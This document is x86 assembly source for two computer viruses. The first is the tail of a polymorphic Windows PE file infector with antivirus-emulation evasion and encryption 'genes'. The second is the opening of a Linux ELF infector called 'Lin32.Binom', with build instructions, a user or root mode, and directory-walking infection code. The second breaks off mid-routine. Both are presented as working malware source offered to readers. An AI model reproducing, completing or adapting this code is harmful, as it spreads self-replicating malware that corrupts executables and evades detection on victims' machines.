; dir table mov edx,[edi+74h] ; dir entries shl edx,3 ; * 8 add esi,edx ; last section mov eax,[edi+28h] ; get entrypoint mov dword [ebp+(OldEIP-delta)],eax ; save mov edx,[esi+10h] ; edx = size of raw data mov ebx,edx ; add edx,[esi+14h] ; add pointer to raw data push edx mov eax,ebx add eax,[esi+0Ch] ; eax = new eip mov [edi+28h],eax ; change it mov dword [ebp+(NewEIP-delta)],eax mov [ebp+(sheader-delta)], esi mov [ebp+(dheader-delta)], edi pop edx or dword [esi+24h],0A0000020h ; put writeable, readable, executable xchg edi,edx add edi,dword [ebp+(filemem-delta)] ; save the stuff for later mov [ebp+(start_host-delta)], edi pushad lea esi, [ebp+(cpy-delta)] lea edi, [ebp+(mutate-delta)] mov ecx, (mutateend-mutate) rep movsb ; save the genes dw 310Fh xor [ebp+(random_seed-delta)], eax ; randomize xor [ebp+(startkey-delta)], al ; .. xor [ebp+(slidingkey-delta)], ah ; .. lea esi, [ebp+(mutate-delta)] mov edi, esi mov ecx, genes_count decide_loop: sub eax, eax ; randomize the genes mov al, genes_count call rand_index or eax, eax jnz noswitch lodsb xor al, 1 ; switch gene off/on stosb jmp switched noswitch: movsb switched: dec ecx jne decide_loop mov ecx, 6 lea esi, [ebp+(regs-delta)] decide2_loop: mov eax, 5 call rand_index mov ebx, eax mov al, [esi] xchg al, [esi+ebx] mov [esi], al dec ecx jne decide2_loop popad ; --------------------------------------------------------------------------- original_esp equ [edx-(1*4)] so_virus equ [edx-(2*4)] so_void equ [edx-(3*4)] vsize equ [edx-(4*4)] pos_callplace equ [edx-(5*4)] ads_distance equ [edx-(6*4)] ads_size equ [edx-(7*4)] start_loop equ [edx-(8*4)] poly_generator: mov edx, esp ; stack to edx push esp push esi push edi push ecx ; Gene for cutting of emulation ; ----------------------------- cmp [ebp+(gene_noemul-delta)], 0 je no_emul mov ax, 0C029h stosw mov ax, 0C8FEh ; sub eax, eax stosw ; keep_going: dec al mov ax, 0C008h ; or al, al stosw ; je was_oke mov ax, 0474h ; jne keep_going stosw ; jmp somewhere_in_code mov ax, 0F875h ; was_oke: stosw mov ax, 67EBh stosw no_emul: ; Extra anti emulation ; -------------------- cmp [ebp+(gene_specialkey-delta)], 0 jne skipskey cmp [ebp+(startkey-delta)], 0 je skipskey ; here an av would get mov ax, 1829h ; forced to loop X times or ah, [ebp+(gene_encrypt-delta)] ; in order to get the shl ah, 3 ; encryption key or ah, [ebp+(gene_encrypt-delta)] ; if it doesn't (and most- stosw ; don't) the virus body mov ax, 0C929h ; will be wrongly de- stosw ; crypted mov al, 0B1h stosb mov al, [ebp+(startkey-delta)] stosb mov al, 40h or al, [ebp+(gene_encrypt-delta)] stosb mov ax, 0FDE2h cmp [ebp+(gene_specialkeyl-delta)],0 jne no_decskl mov al, 049h stosb mov ax, 0FC75h no_decskl: stosw skipskey: ; Gene for the Call ; ----------------- cmp [ebp+(gene_call-delta)], 0 jne callway2 mov al, 0E8h ; call nextbyte stosb push edi sub eax, eax ; " " stosd mov al, 58h or al, [ebp+(gene_memreg-delta)] stosb jmp callend callway2: mov al, 0E8h ; call to_end_of_code stosb push edi stosd callend: ; Gene for adding distance ; ------------------------ mov al, 81h ; this is always in front of ; add and sub cmp [ebp+(gene_distance-delta)],0 jne distance2 mov ah, 0C0h ; add jmp distancedone distance2: mov ah, 0E8h ; sub distancedone: or ah, [ebp+(gene_memreg-delta)] stosw push edi stosd ; Gene for declaring virus-size ; ----------------------------- cmp [ebp+(gene_size-delta)],0 jne size2 mov al, 0B8h ; mov reg, x or al, [ebp+(gene_counter-delta)] stosb jmp size_done size2: cmp [ebp+(gene_sizem-delta)], 0 jne sizem2 mov ax, 01831h ; xor reg, reg or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw jmp sizeput sizem2: mov ax, 01829h or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw sizeput: cmp [ebp+(gene_sizea-delta)], 0 je puts2 mov ax, 0F081h jmp putsand puts2: mov ax, 0C881h putsand: or ah, [ebp+(gene_counter-delta)] stosw size_done: push edi mov eax, virus_size stosd ; Gene for declaring the first ; encryption value ; ---------------------------- cmp [ebp+(gene_specialkey-delta)], 0 je key_done key_normal: cmp [ebp+(gene_1stval-delta)],0 jne firstval2 mov al, 0B8h or al, [ebp+(gene_encrypt-delta)] stosb jmp firstvalend firstval2: cmp [ebp+(gene_1stvalb-delta)], 0 jne firstvalb2 mov ax, 0E083h or ah, [ebp+(gene_encrypt-delta)] stosw sub eax, eax stosb jmp firstvalb_end firstvalb2: mov ax, 01829h or ah, [ebp+(gene_encrypt-delta)] shl ah, 3 or ah, [ebp+(gene_encrypt-delta)] stosw firstvalb_end: cmp [ebp+(gene_addenc-delta)], 0 jne fza2 mov ax, 0C081h or ah, [ebp+(gene_encrypt-delta)] stosw jmp firstvalend fza2: mov ax, 0C881h or ah, [ebp+(gene_encrypt-delta)] stosw firstvalend: push edi sub eax, eax mov al, [ebp+(startkey-delta)] stosd key_done: push edi ; Get byte gene ; ------------- cmp [ebp+(gene_getbyte-delta)], 0 jne getbyte2 mov al, 08Ah ; xchg or mov jmp getbytedone getbyte2: mov al, 086h getbytedone: mov ah, [ebp+(gene_memreg-delta)] stosw ; Encrypt byte gene ; ----------------- cmp [ebp+(gene_encryptb-delta)], 0 jne eb2 mov ax, 2966h ; sub jmp insbe eb2: mov ax, 3166h ; xor insbe: stosw mov al, 18h or al, [ebp+(gene_encrypt-delta)] shl al, 3 stosb ; Store byte gene ; --------------- mov al, 88h cmp [ebp+(gene_store-delta)], 0 ; xchg or mov again jne store2 mov al, 86h store2: mov ah, [ebp+(gene_memreg-delta)] stosw ; Increment memreg gene ; --------------------- cmp [ebp+(gene_increment-delta)], 0 jne inc2 mov al, 040h ; inc or al, [ebp+(gene_memreg-delta)] stosb jmp incdone inc2: mov ax, 0C083h ; add or ah, [ebp+(gene_memreg-delta)] stosw mov al, 1 stosb incdone: ; Change the encryption key gene ; ------------------------------ cmp [ebp+(gene_slidingkey-delta)], 0 jne no_slidingkey cmp [ebp+(gene_slidingkeym-delta)], 0 jne slidingkey2 mov al, 80h stosb mov al, 0C0h or al, [ebp+(gene_encrypt-delta)] mov ah, [ebp+(slidingkey-delta)] stosw jmp slidingkey_done slidingkey2: mov al, 40h or al, [ebp+(gene_encrypt-delta)] stosb slidingkey_done: no_slidingkey: ; Decrement the encryptcount gene ; ------------------------------- cmp [ebp+(gene_ecount-delta)], 0 jne ecount2 mov ax, 0E883h or ah, [ebp+(gene_counter-delta)] stosw mov al, 1 jmp ecount_done ecount2: mov al, 48h or al, [ebp+(gene_counter-delta)] ecount_done: stosb ; Loop gene ; --------- cmp [ebp+(gene_loop-delta)], 0 jne loop2 mov ax, 0F883h or ah, [ebp+(gene_counter-delta)] stosw sub eax, eax stosb mov ebx, edi sub ebx, start_loop neg bl dec bl dec bl mov al, 75h cmp [ebp+(gene_loop2-delta)], 0 jne loop1b mov al, 77h loop1b: mov ah, bl stosw jmp loopdone loop2: mov ax, 1809h or ah, [ebp+(gene_counter-delta)] shl ah, 3 or ah, [ebp+(gene_counter-delta)] stosw mov ebx, edi sub ebx, start_loop neg bl dec bl dec bl mov al, 75h mov ah, bl stosw loopdone: ; Catch call gene ; --------------- cmp [ebp+(gene_call-delta)], 0 je skip_catchcall mov al, 0EBh stosb ; ... mov esi, edi stosb mov eax, edi mov ebx, pos_callplace sub eax, ebx sub eax, 4 mov [ebx], eax mov al, 58h or al, [ebp+(gene_memreg-delta)] stosb cmp [ebp+(gene_callret-delta)], 0 je callret2 mov al, 50h or al, [ebp+(gene_memreg-delta)] mov ah, 0C3h stosw jmp endcallret callret2: mov ax, 0E0FFh or ah, [ebp+(gene_memreg-delta)] stosw endcallret: mov eax, edi sub eax, esi dec eax mov [esi], al skip_catchcall: ; .................................................................................... ender: mov ecx, ads_distance mov eax, edi sub eax, pos_callplace sub eax, 4 cmp [ebp+(gene_distance-delta)], 0 je skip_neg neg eax skip_neg: mov [ecx], eax push edi lea esi,[ebp+(virus_start-delta)] ; copy virus (with changed DNA) mov ecx,virus_size ; to host rep movsb ; pop esi mov eax, esi sub eax, [ebp+(start_host-delta)] mov [esi+1], eax sub ebx, ebx cmp [ebp+(gene_slidingkey-delta)], 0 jne skip_sliding cmp [ebp+(gene_slidingkeym-delta)], 0 jne s_onlyinc mov bl, [ebp+(slidingkey-delta)] dec bl s_onlyinc: inc bl skip_sliding: mov bh, [ebp+(startkey-delta)] push edi mov edi, esi mov ecx, virus_size cmp [ebp+(gene_encryptb-delta)], 0 jne loop_encryptx loop_encrypta: lodsb add al, bh stosb add bh, bl loop loop_encrypta jmp endx loop_encryptx: lodsb xor al, bh stosb add bh, bl loop loop_encryptx endx: pop edi mov esp, original_esp ; --------------------------------------------------------------------------- sub edi, [ebp+(start_host-delta)] mov [ebp+(start_host-delta)], edi push FILE_ATTRIBUTE_NORMAL mov eax, [ebp+(findmem-delta)] lea eax, [eax+44] push eax call SetFileAttributes push 0 push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 0 push 0 push GENERIC_WRITE mov eax, [ebp+(findmem-delta)] lea eax, [eax+44] push eax call CreateFile mov [ebp+(file_handle-delta)], eax inc eax jz close_mem push 0 lea eax, [ebp+(NBR-delta)] push eax mov eax, [ebp+(findmem-delta)] mov eax, [eax+32] add eax, [ebp+(start_host-delta)] mov ecx, [ebp+(file_align-delta)] call align_it push eax mov esi,[ebp+(sheader-delta)] mov edi,[ebp+(dheader-delta)] mov eax,[esi+10h] ; SizeOfRawData add eax,[ebp+(start_host-delta)] ; +virus_size+decryptor_size mov ecx,[edi+3Ch] call align_it mov [esi+10h], eax ; save the new sizes mov [esi+08h], eax ;mov eax,[esi+10h] ; EAX = New SizeOfRawData add eax,[esi+0Ch] mov [edi+50h],eax ; save to size of image push [ebp+(filemem-delta)] push [ebp+(file_handle-delta)] call WriteFile lea eax, [ebp+(filetime-delta)] ; normal time to local filetime push eax lea eax, [ebp+(systemtime-delta)] push eax call SystemTimeToFileTime lea eax, [ebp+(filetime2-delta)] ; local filetime to filetime push eax lea eax, [ebp+(filetime-delta)] push eax call LocalFileTimeToFileTime push 0 ; mark the file as infected push 0 lea eax, [ebp+(filetime2-delta)] push eax push [ebp+(file_handle-delta)] call SetFileTime close_mem: push [ebp+(filemem_handle-delta)] call GlobalUnlock push [ebp+(filemem_handle-delta)] call GlobalFree close_file: push [ebp+(file_handle-delta)] ; set original attributes call CloseHandle mov eax, [ebp+(findmem-delta)] push dword [eax] lea eax, [eax+44] push eax call SetFileAttributes return_infect: ret ; simple align a value ; -------------------- align_it: push edx sub edx, edx push eax div ecx pop eax sub ecx, edx add eax, ecx pop edx ret ; random number between 0 and eax ; (this is a good one!) ; ------------------------------- rand_index: push edx push ecx push ebx mov ecx, eax inc ecx mov eax, [ebp+(random_seed-delta)] rol eax, 5 ; by me ;) neg ax mov bx, ax sub al, ah bswap eax xor ah, al sub ax, bx mov [ebp+(random_seed-delta)], eax sub edx, edx div ecx mov eax, edx pop ebx pop ecx pop edx ret ; ----------------------------------------------------------------------------------- ; DATA file_handle dd 0 filemem_handle dd 0 ; handles filemem dd 0 file_align dd 0 return_addr dd 0 start_host dd 0 search_mask db "test*.exe",0 find_handle dd 0 findmem_handle dd 0 findmem dd 0 startkey db 11h slidingkey db 9Ch ; The virus DNA ; Feel free to make changes and see ; the decryptor change :) ; --------------------------------- mutate: gene_call db 0 ; should have been just bits, but whatever ;) gene_distance db 0 gene_size db 0 gene_sizem db 0 gene_sizea db 0 gene_1stval db 0 gene_1stvalb db 0 gene_addenc db 0 gene_getbyte db 0 gene_encryptb db 0 gene_store db 0 gene_increment db 0 gene_ecount db 0 gene_loop db 0 gene_loop2 db 0 gene_noemul db 0 gene_callret db 0 gene_slidingkey db 0 gene_slidingkeym db 0 gene_specialkey db 0 gene_specialkeyl db 0 mgenes_end: regs: gene_memreg db 6h ; I think i forgot to make code for changing gene_counter db 1h ; these :D. Whatever ;) gene_encrypt db 3h gene_encryptc db 2h gene_junk1 db 5h gene_junk2 db 7h mutateend: cpy rb (mutateend-mutate) filetime dd 0,0 filetime2 dd 0,0 systemtime dw 0,0,0,0,0,0 ssecond dw 0 smsecond dw 0 random_seed dd 93FA017Bh NBR dd 0 k32 dd 0 getprocaddr dd 0 sheader dd 0 dheader dd 0 gptext db 'GetProcAddress',0 ; Api table k32_apis db "FindFirstFileA",0 _FindFirstFile dd 0 db "FindNextFileA",0 _FindNextFile dd 0 db "FindClose",0 _FindClose dd 0 db "CreateFileA",0 _CreateFileA dd 0 db "ReadFile",0 _ReadFile dd 0 db "WriteFile",0 _WriteFile dd 0 db "CloseHandle",0 _CloseHandle dd 0 db "GlobalAlloc",0 _GlobalAlloc dd 0 db "GlobalLock",0 _GlobalLock dd 0 db "GlobalUnlock",0 _GlobalUnlock dd 0 db "GlobalFree",0 _GlobalFree dd 0 db "SetFileAttributesA",0 _SetFileAttributes dd 0 db "FileTimeToLocalFileTime",0 ; apis used for _FileTimeToLocalFileTime dd 0 ; filemarking db "FileTimeToSystemTime",0 _FileTimeToSystemTime dd 0 db "SystemTimeToFileTime",0 _SystemTimeToFileTime dd 0 db "LocalFileTimeToFileTime",0 _LocalFileTimeToFileTime dd 0 db "SetFileTime",0 _SetFileTime dd 0 db 0 end_of_virus: ; &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

sources

Lin32.Binom Cyneox ; ; ; _______ __ __ __ _ _______ _____ _ _ ; | \_/ | \ | |______ | | \___/ ; |_____ | | \_| |______ |_____| _/ \_ ; ; ; proudly presents ; ; .____ .__ ________ ________ __________.__ ; | | |__| ____ \_____ \ \_____ \ \______ \__| ____ ____ _____ ; | | | |/ \ _(__ < / ____/ | | _/ |/ \ / _ \ / \ ; | |___| | | \/ \/ \ | | \ | | ( <_> ) Y Y \ ; |_______ \__|___| /______ /\_______ \ /\______ /__|___| /\____/|__|_| / ; \/ \/ \/ \/ \/ \/ \/ ; Date: 2.10.2004 ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-| I*N*T*R*O*D*U*C*T*I*O*N |-|-|-|- -|-|-|-|-|-| C*O*M*P*I*L*E |-|-|-|-|-|- ; ; Well I dont want to tell you much There are options to compile this ; about this project... Just check source: FUCK_USER or FUCK_SYSTEM ; out the code and build your own ; oppinion. I'd like to thank to all bash:# nasm -f elf -D [OPTION] -o \ ; people on #DCA , #vx-lab , #lin32asm binom.o binom.asm ; for all their support. OPTION=FUCK_USER or FUCK_SYSTEM ; And now something special to my dar- ; ling: Caline I'll always love you. bash:# gcc -o binom binom.o ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-|-|-|-|-|-|-|-|-|-| A*B*O*U*T |-|-|-|-|-|-|-|-|-|-|-|-|-|-|- ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; ; Like I said there 2 options.Binom ; means "two" so you'll have 2 versions ; of the virus. Its quite simple since ; it uses macros. ; ; Option FUCK_USER | FUCK_SYSTEM ; ------------------|------------------------------------------ ; Path to infect | "." | "/bin" ; ------------------------------------------------------------- ; File type | ELF | ELF ; ------------------------------------------------------------- ; Required rights | normal | root ; ------------------------------------------------------------- ; Infecting | SPI + Abuse of | SPI + Abuse of ; technique | _libc_start_main | shard libraries ; -------------------------------------------------------------- ; | yes(calculating | yes ; EPO |return addr using | ; |relative offsets) | ; -------------------------------------------------------------- ; Payload | yes(print msg) | yes(print msg) ; -------------------------------------------------------------- ; | no (change | no(change push ; Change entry | call instruction | instruction in the ; point | in the startup | startup routine ; | routine) | ; -------------------------------------------------------------- ; Files nr. to | all | all ; infect | | ; -------------------------------------------------------------- ; Invisible | yes(foking to | yes(froking to back- ; | background) | ground) ; -------------------------------------------------------------- ; ; ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| ; -|-|-|-|-|-|-|-|-|-|-|-| E*O*F |-|-|-|-|-|-|-|-|-|-|-|-|-|-|- ; |-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-| %define SYS.FORK 2 %define SYS.READ 3 %define SYS.WRITE 4 %define SYS.OPEN 5 %define SYS.CLOSE 6 %define SYS.CHDIR 12 %define SYS.LSEEK 19 %define SYS.GETUID 24 %define SYS.GETGID 47 %define SYS.READDIR 89 %define SYS.MMAP 90 %define SYS.UNMMAP 91 %define SYS.STAT 106 %define SYS.GETCWD 183 %define STRUCT_STAT_SZ 64 %define STRUCT_DIRENT_SZ 266 %define STRUCT_MMAP_SZ 24 %define LOCAL_STACK_SZ 80 %define GLOBAL_STRUCT_SZ 134 %define MAGIC_FILE_MODE 7q %define MAGIC_FILE_BIT_MASK 170000q %define MAGIC_ELF 0x464c457f %define MAGIC_ELF_BASE 0x8048000 %define MAGIC_VIRUS_SIZE 0x1000 %define E_TYPE_OFFSET 16 %define E_ENTRY 0x18 %define E_PHOFF 0x1c %define E_PHENTSIZE 0x20 %define E_SHOFF 0x20 %define E_SHENTSIZE 0x28 %define E_PHNUM 0x2c %define E_SHNUM 0x30 %define PHDR_INDEX_DATA 3 %define PHDR_INDEX_TEXT 2 %define PHDR_P_FILESZ 16 %define PHDR_P_MEMSZ 20 %define PHDR_P_VADDR 8 %define SHDR_SH_OFFSET 16 %define SHDR_SH_SIZE 20 %ifdef FUCK_SYSTEM %define FIRST_PATH 0x0 %endif %ifdef FUCK_USER %define FIRST_PATH 0x2e %endif %define PATH_LENGHT 128 %define REG_FILE 10q %define DIREC 4q %define POINT 0x002e %define DOUBLE_POINT 0x2e2e section .text global main main: pusha pushf push ebp mov esp,ebp ; fork us baby .... mov eax,SYS.FORK mov ebx,0 int 0x80 ; checking wheter child or parent process ; is active cmp eax,0 jne parent_process child_process: ; first of all we must get the sysuid of current ; user...maybe we're root ;)) mov eax,SYS.GETUID int 0x80 push eax ; get gid and store it on stack... mov eax,SYS.GETGID int 0x80 push eax ; allocate space for the stat structure ; which will be needed by the stat function... ; then we'll scan beginning with "/" all directories ; and searching for ELF files. sub esp,STRUCT_STAT_SZ ; here are the "default" infos which are needed by stat() push dword FIRST_PATH ; first path to start with scaning push dword 0x7 ; file permissions %ifdef FUCK_SYSTEM mov esi,_system %endif ; start scaning beginning with FIRST_PATH call scan4files add esp,4*2 ; restore "default" infos add esp,STRUCT_STAT_SZ ; restore stat structure add esp,8 ; restore gid and uid jmp restore_data parent_process: mov eax,SYS.WRITE mov ebx,1 mov ecx,payload mov edx,len int 0x80 jmp _exit scan4files: %ifdef FUCK_USER mov esi,esp add esi,8 %endif mov edi,esp add edi,4 ; edi = access permissions ; store some space for our "global" structure for files ; this structure will contain the needed file descriptor ; , the access permissions and the complete path name ; of that file... sub esp,4 ; fd sub esp,1 ; permissions sub esp,1 ; file type : reg file or directory sub esp,PATH_LENGHT ; complete path lenght of file ;---> GLOBAL_STRUCT_SZ = size of this "global" structure ; stat our file name and complete the global structure ; with necessary information mov eax,SYS.STAT mov ebx,esi ; file name mov ecx,ebp ; BASE pointer sub ecx,STRUCT_STAT_SZ ; move to beginning of our stat structure int 0x80 cmp eax,0x0 jge stat_ok jmp _stat_error restore_data: pop ebp popf popa jmp _exit stat_ok: ; checking permissions on FIRST_PATH mov ebx,ebp sub ebx,STRUCT_STAT_SZ ; move to stat structure mov ax,[ebx+8] ; stat.st_mode ; comparing uid of FIRST_PATH with uid of currently ; executed file... mov cx,word [ebx+12] ; stat.st_uid cmp word cx,[ebp-4] je user_permission ; we have user permission on FIRST_PATH mov cx,word [ebx+14] cmp word cx,[ebp-8] je group_permission ; group access ; check if we're root ... hehe.. cmp word [ebp-8],0 je user_permission others_permission: ; ax = stat.st_mode ( look below ) and al,MAGIC_FILE_MODE jmp access_file user_permission: shr ax,0x6 and al,MAGIC_FILE_MODE jmp access_file group_permission: shr ax,0x3 and al,MAGIC_FILE_MODE access_file: ; store access permissions to our global ; structure mov byte [esp+PATH_LENGHT+1],al ; permissions ; checking file type : REG_FILE or DIREC mov ebx,ebp sub ebx,STRUCT_STAT_SZ mov ax,[ebx+8] ; stat.st_mode and ax,MAGIC_FILE_BIT_MASK shr ax,12 ; store file type to glob. structure... mov byte [esp+PATH_LENGHT],al ; checking if REG_FILE or DIREC ... mov al,byte [esp+PATH_LENGHT] cmp al,DIREC je directory ; jmp if file name is a directory cmp al,REG_FILE je near regular_file ; jmp if regular file... jmp _access_error directory: ; save current working directory... mov eax,SYS.GETCWD mov ebx,esp mov ecx,PATH_LENGHT int 0x80 ; opening directory... mov eax,SYS.OPEN mov ebx,esi ; file name mov ecx,0 ; ecx = 0 = O_RDONLY mov edx,0 int 0x80 ; check returned file descriptor.... cmp eax,0x0 jge open_ok jmp _open_error open_ok: ; save file descriptor to our glob.structure... mov [esp+PATH_LENGHT+2],eax ; file descriptor ; chdir to that directory so we can search for another ; files in that directory... mov eax,SYS.CHDIR mov ebx,esi ; file name int 0x80 ; allocating stack space for our dirent structure ; which will be needed for searching new files etc. sub esp,STRUCT_DIRENT_SZ read_directory: mov eax,SYS.READDIR mov ebx,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+2] ; file descriptor mov ecx,esp mov edx,1 int 0x80 cmp eax,0x1 jne near _readdir_error ; search for files in the directory and call scan4files... ; we'll have to skip "." and ".." coz they're ; irrelevant to us cmp word [esp+10],POINT ; [esp+10]=dirent.d_name je skip_points cmp word [esp+10],DOUBLE_POINT je skip_points xor eax,eax mov al,[esp+STRUCT_DIRENT_SZ+PATH_LENGHT+1] ; file permissions add esp,10 ; dirent.d_name %ifdef FUCK_USER push eax %endif %ifdef FUCK_SYSTEM mov esi,esp %endif call scan4files %ifdef FUCK_USER add esp,4 ; restore that "push eax" %endif sub esp,10 ; restore "add esp,10" skip_points: jmp read_directory regular_file: ; open file with flags READ & WRITE mov eax,SYS.OPEN mov ebx,esi ; esi = file name xor ecx,ecx mov ecx,2 int 0x80 cmp eax,0 jg file_write_perms jmp scan_return file_write_perms: ; save opened file descriptor to global structure mov [esp+PATH_LENGHT+2],eax ; finding out file's size using lseek ;) mov eax,SYS.LSEEK mov ebx,[esp+PATH_LENGHT+2] ; fd xor ecx,ecx mov edx,2 ; SEEK_END int 0x80 file_map: mov ecx,eax ; ecx = file lenght mov eax,SYS.MMAP mov edx,[esp+PATH_LENGHT+2] ; fd ; declaring mmap structure ... sub esp,STRUCT_MMAP_SZ mov dword [esp],0 ; int start mov [esp+4],ecx ; file lenght mov dword [esp+8],3 ; READ_WRITE mov dword [esp+12],1 ; MAP_SHARED mov dword [esp+16],edx ; fd mov dword [esp+20],0 ; int offset mov ebx,esp ; pointer to mmap structure int 0x80 ; restoring mmap structure... add esp,STRUCT_MMAP_SZ cmp eax,-1 jne file_map_ok jmp scan_return file_map_ok: ; save us some stack where we can store mmap addr,file ; lenght etc... mov esi,eax mov ebx,[eax] mov edx,MAGIC_ELF cmp edx,ebx je file_is_elf close_target: mov ebx,esi mov eax,SYS.UNMMAP int 0x80 mov eax,SYS.CLOSE mov ebx,[esp+PATH_LENGHT+2] int 0x80 jmp scan_return file_is_elf: ; ok...we found an ELF file.but remember there are ; several ELF file types like : executables, objects, ; relocatables...only the executable ones are for us ; relevant... file_elf_exec: ; checking is found file is an executable ELF file... ; therefore we will jump at offset ehdr.e_type and will ; compare the value with 2 . if the value = 2 then we found ; an executable and we can start with the infection of our file.. mov eax,esi ; esi = addr of maped file add eax,E_TYPE_OFFSET mov eax,[eax] ; data pointed by eax(addr of maped file) mov edx,eax xor eax,eax mov al,dl ; we only need the first byte cmp byte al,0x2 ; checking if ehdr.e_type == ET_EXEC je elf_exec_ok jmp close_target elf_exec_ok: ; we need some stack for storing our mmap addr , file ; lenght , etc. sub esp,LOCAL_STACK_SZ mov [esp+4],esi ; mmap addr mov [esp+8],ecx ; file lenght mov eax,[esi+E_ENTRY] ; ehdr.e_entry mov [esp+12],eax ; store entry point mov eax,[esi+E_PHOFF] ; ehdr.e_phoff mov [esp+16],eax ; store phdr offset mov eax,[esi+E_SHOFF] ; ehdr.e_shoff mov [esp+20],eax ; store shdr offset mov eax,[esi+E_PHNUM] and eax,0xffff ; ehdr.e_phnum mov [esp+24],eax ; store phdr number mov eax,[esi+E_SHNUM] and eax,0xffff ; ehdr.e_shnum mov [esp+28],eax ; store shdr number check_if_space: ; checking if space is available between code segment ; and data segment... ; since the code size is limited we must check if there is ; enough space where to insert our virus code.maximum code ; size is restricted by code alignment which is 0x1000=4096. ; SO : if the difference between code and data segment ; is lower than ELF_PAGE_SZ=0x1000 then we'll have to ; cancel our infection routine... mov ebx,[esp+16] ; e_phoff add esi,ebx ; esi=ptr to mapped ; file --> move to first PHDR entry phdr[0] mov ecx,[esi+32*PHDR_INDEX_DATA+PHDR_P_VADDR] ; phdr[3].p_vaddr : data segment (RW) mov eax,[esi+32*PHDR_INDEX_DATA+PHDR_P_FILESZ] ; phdr[3].p_filesz mov ebx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; phdr[2].p_filesz: text segment (RE) mov [esp+32],ebx ; store p_filesz of .text mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; phdr[2].p_vaddr add ebx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; phdr[2].p_filesz + phdr[2].p_vaddr sub ecx,ebx ; phdr[3].p_vaddr - (phdr[2].p_filesz + phdr[2].p_vaddr) mov eax,MAGIC_VIRUS_SIZE ; the virus size is actually the ELF_PAGE_SIZE cmp ecx,eax jl near no_insertion_space ; from now on the target is actually ready to be infected... ; we have an executable ELF file which has enough space ; between his code and data segment to insert our virus code... %ifdef FUCK_USER start_infection: ; first of all we must do some "comparisation" processes.. mov eax,[esp+12] ; e_entry sub eax,MAGIC_ELF_BASE ; find out offset to entry code mov esi,[esp+4] ; addr to mapped file add esi,eax ; compare "call" of current program with "call" of target ; to see if target was infected by a superiour virus add esi,0x21 mov ebx,esi ; "beyond the call" sub esi,0x21 add esi,0x1d mov ecx,esi ; our patch address mov [esp+36],ebx ; store addr "beyond the call" mov [esp+40],ecx ; store "our patch address" ; now we'll have to patch that addr with our new entry ; point.REMEMBER: the entry point in the EHDR WILL NOT BE ; CHANGED.THATS THE FUNNY THING OF THIS VIRUS ;=) mov esi,[esp+4] ; mmap addr mov ebx,[esi+E_PHOFF] ; offset to first byte ; of PHDR add esi,ebx ; move to first byte mov ecx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; p_filesz mov edx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; p_vaddr add ecx,edx ; p_vaddr + p_filesz ; align up the new entry point addr ; ALIGN_UP(x) (((x)+15)& ~15) add ecx,15 ; ecx = new entry ; point and ecx,~15 mov ebx,[esp+36] ; addr beyond the call sub ecx,ebx mov edx,[esp+40] ; "patch addr" ; first of all find out the addr which call should have called... mov esi,[esp+36] ; beyond the call mov eax,[edx] ; patch point add eax,esi ; addr we search for mov [edx],ecx ; store new addr mov [esp+44],ecx ; copy new relative offset to stack mov [esp+48],eax ; original addr %endif %ifdef FUCK_SYSTEM start_infection: mov eax,[esp+12] ; entry addr sub eax,MAGIC_ELF_BASE ; offset to entry point mov esi,[esp+4] ; mmap addr add esi,eax add esi,0x18 ; our patch point mov ecx,esi ; our patch address sub esi,0x18 add esi,0x21 ; "beyond the call" mov ebx,esi mov [esp+36],ebx ; store addr "beyond the call" mov [esp+40],ecx ; store "our patch address" mov esi,[esp+4] ; mmap addr mov ebx,[esi+E_PHOFF] ; offset to first byte ; of PHDR add esi,ebx ; move to first byte mov ecx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] ; p_filesz mov edx,[esi+32*PHDR_INDEX_TEXT+PHDR_P_VADDR] ; p_vaddr add ecx,edx ; p_vaddr + p_filesz ; align up the new entry point addr ; ALIGN_UP(x) (((x)+15)& ~15) add ecx,15 ; ecx = new entry ; point and ecx,~15 mov ebx,[esp+40] ; our patch addr mov eax,[ebx] ; save original addr to stack mov [esp+48],eax mov [ebx],ecx ; patching addr %endif patch_e_phoff: mov esi,[esp+4] mov ebx,[esi+E_PHOFF] mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ] add esi,ebx ; store p_filesz to stack mov [esp+52],eax ; patch p_filesz add dword[esi+32*PHDR_INDEX_TEXT+PHDR_P_FILESZ],MAGIC_VIRUS_SIZE ; store p_memsz to stack mov eax,[esi+32*PHDR_INDEX_TEXT+PHDR_P_MEMSZ] mov [esp+56],eax ; patch p_memsz add dword[esi+32*PHDR_INDEX_TEXT+PHDR_P_MEMSZ],MAGIC_VIRUS_SIZE ; initialize registers for patch_phdr mov edx,[esp+4] ; mmap addr mov eax,[esp+16] ; old ehdr.e_phoff add edx,eax ; move to phdr[0] mov ebx,MAGIC_VIRUS_SIZE mov eax,[esp+32] ; old p_filesz mov ecx,[esp+24] ; ehdr.e_phnum -> needed by the loop instruction patch_phdr: cmp dword [edx+4],eax ; (edx+4)=p_offset ; compare if ; p_offset >= end of code segment(old p_filesz) jbe next_phdr_entry add dword [edx+4],ebx ; else patch ; p_offset -> new p_offset = old p_offset + MAGIC_VIRUS_SIZE next_phdr_entry: add edx,E_PHENTSIZE ; move to 